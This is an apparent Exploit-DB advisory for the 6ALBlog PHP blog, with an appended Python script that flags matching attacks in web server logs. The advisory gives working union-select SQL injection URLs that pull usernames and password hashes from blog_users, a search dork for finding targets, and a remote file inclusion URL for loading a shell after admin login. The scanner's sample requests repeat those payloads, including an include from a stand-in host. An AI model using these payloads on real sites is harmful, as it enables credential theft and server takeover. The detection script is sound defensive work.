- 18 Dec 2022
- EDB-ID
- 4104
- EDB verification
- Passed
- Author
- CRACKERS_CHILD
- Vulnerability type
- WEBAPPS
- Platform
- PHP
- CVE
- cve-2007-3451 cve-2007-3450 cve-2007-3449
- Publication date
- 2007-06-25
Code:
+______________________________________________By Crackers_Child___________________________________________+
*
*
* [~] Portal.......: 6ALBlog All Versions
* [~] Download.....: http://down.otand.com/download/code/php/blog/6alblog.rar
* [~] Author.......: Crackers_Child | [email protected] & [email protected]
* [~] Class........: Remote SQL Injection and Remote File İnclude Vulnerability
* [~] Dork.........: inurl:"member.php?page=comments
+_______________________________________________________________________________________________________________________+
+_______________________________________________________________________________________________________________________+
*
*
* [~] Exploit Sql...: http://[Taget]/[Path]/member.php?page=comments&member=MEMBERNAME&newsid=-1%20union%20select%200,1,user,3,4,5,6,7%20from%20blog_users/*
* http://[Taget]/[Path]/member.php?page=comments&member=MEMBERNAME&newsid=-1%20union%20select%200,1,pass,3,4,5,6,7%20from%20blog_users/*
*
*
* [~] Exploit Rfi...: After Cracked md5 admin you must login site.com/admin/ than our rfi can work
*
* http://[Taget]/[Path]/admin/index.php?pg=Sh3ll?
+_______________________________________________________________________________________________________________________+
[~] İnfo......:Brothas You must change MemberName on exploit , when you look index.php you will see members and you can choose anyone
and you can write it on exploit "MEMBERNAME" area ;)
+_______________________________________________________________________________________________________________________+
+_______________________________________________________________________________________________________________________+
*
*
* [~] Sp Tnx.......: str0ke, BiyoSecurity.Net, TurkProtest, Tryag.com/cc/(Mahmood_ali),Dj7xpl,Dosyacek.com And All Friends
*
+_______________________________________________________________________________________________________________________+
# milw0rm.com [2007-06-25]
- Source
- www.exploit-db.com
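
For defenders reviewing web server logs, the sketch below is an added example (not part of the original advisory and not 6ALBlog code) that flags requests matching the two parameter abuses described above: a non-numeric `newsid` on `member.php?page=comments` and a `pg` value on `admin/index.php` that is not a plain local page name. The sample request lines, the `/blog` path, the host `files.example.invalid`, and the assumption that legitimate `pg` values are short alphanumeric names are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed request targets (path + query) as they would appear in an access log.
SAMPLE_REQUESTS = [
    "/blog/member.php?page=comments&member=alice&newsid=12",
    "/blog/member.php?page=comments&member=alice"
    "&newsid=-1%20union%20select%200,1,user,3,4,5,6,7%20from%20blog_users/*",
    "/blog/admin/index.php?pg=settings",
    "/blog/admin/index.php?pg=http://files.example.invalid/x.txt?",
]

NUMERIC_ID = re.compile(r"[0-9]+")
# Assumption: a legitimate pg value is a short local page name, never a URL or path.
LOCAL_PAGE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def classify(target):
    """Return the findings for one request target; an empty list means clean."""
    parts = urlsplit(target)
    # parse_qs percent-decodes values, so encoded spaces and keywords are visible.
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    if parts.path.endswith("/member.php") and "comments" in params.get("page", []):
        for value in params.get("newsid", []):
            # newsid should be a plain positive integer; anything else is suspect.
            if not NUMERIC_ID.fullmatch(value):
                findings.append("sqli:newsid")
    if parts.path.endswith("/admin/index.php"):
        for value in params.get("pg", []):
            # URLs, slashes, dots and trailing '?' all fail the local-name pattern.
            if not LOCAL_PAGE.fullmatch(value):
                findings.append("rfi:pg")
    return findings


def scan(targets):
    """Map each flagged request target to its findings, skipping clean ones."""
    flagged = {}
    for target in targets:
        findings = classify(target)
        if findings:
            flagged[target] = findings
    return flagged


if __name__ == "__main__":
    for target, findings in scan(SAMPLE_REQUESTS).items():
        print(findings, target)
```

The same two rules (integer-only `newsid`, allowlisted `pg`) are what the application itself should enforce before building a query or an include path.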